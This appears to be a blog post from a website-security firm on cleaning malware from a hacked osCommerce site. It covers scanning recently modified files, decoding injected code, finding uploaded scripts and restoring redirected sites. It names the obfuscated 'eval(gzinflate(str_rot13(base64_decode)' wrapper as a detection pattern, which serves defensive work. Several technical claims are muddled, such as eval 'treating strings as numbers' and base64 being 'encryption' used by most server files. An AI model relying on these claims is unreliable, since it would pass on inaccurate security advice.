Malware attacks are no longer things that PC owners on server maintenance officers have to fear. Website owners are currently also victim to this deadly attacks propagated by hackers. Incase your website is hit and for some reason you did not have backup, there are several things that you should consider doing to make sure that you are back on your feet.
Malware removal can be approached systematically by adhering to a set of steps that reverse the attack procedure.
Depending on the size of your website and the number of sites hosted on the server in question, the implementation of the above osCommerce malware removal steps will vary in intensity.
In this step, you should look for files that were most recently modified before things went haywire and making them for inspection. A good range of time to dig into is up to 48 hours after the attack became manifest.
A simple way to do this is by using ‘eval’ commands that sort of treat strings as numbers and do mathematical computations with them. Though dumb, this can be applied in the identification of specific code snippets in your files.
After the above step of identifying recent stamped files is over, the next step is going through each file to identify patterns and alteration characteristics that are not in the way you do things at your firm. Under most circumstances, malware removal depends on the fact that an attacker will never have the trademark touch that the inside team has in doing things, unless it was an inside job.
The most common alterations that should be looked for are in the alteration of file code, made either at the start of the scripts or at random places. Such code alterations, though simple can give the attacker access to your system or totally crash your servers and the only option out is deleting such lines of code.
Though this might sound simple, it is not. Most server files are encrypted using some format with a common one being the base64 encryption. A good Base64 Decoder will do the task well for you. (Encoded lines start with eval(gzinflate(str_rot13(base64_decode).
After the corrupted files have been successfully corrected, the next thing you should think of is the identification of the window through which the hacker accessed your system. Though this might be tedious, especially if you are dealing with an expert, it is something that must be done if you totally want to lock the hacker out.
The easiest way to find them is by looking for script files uploaded to your upload file or image folder and any other sections that can allow files to be uploaded to. (They vary depending on the Content Management System you are using). Going through these files will give you ideas of how the criminal got into your system and then shut the loopholes.
The most common way that malware attacks take shape in is through the redirecting of your whole website to another hosting place. To counter this reset the pointers back to your server to ensure that phishing is totally eradicated.
Malware removal is therefore not an easy task to approach on your own especially if you have a heavily loaded server to deal with. There however always is the option of contacting experts to do the job.
If you find this article interesting you also may want to check out the following blog articles: “Removing Malware from a WordPress blog” and “Consequences of your website being blacklisted by Google”.
Let us know what you think and want to learn about website security and malware! Connect With us on Google+ , Twitter and Facebook or even LinkedIn!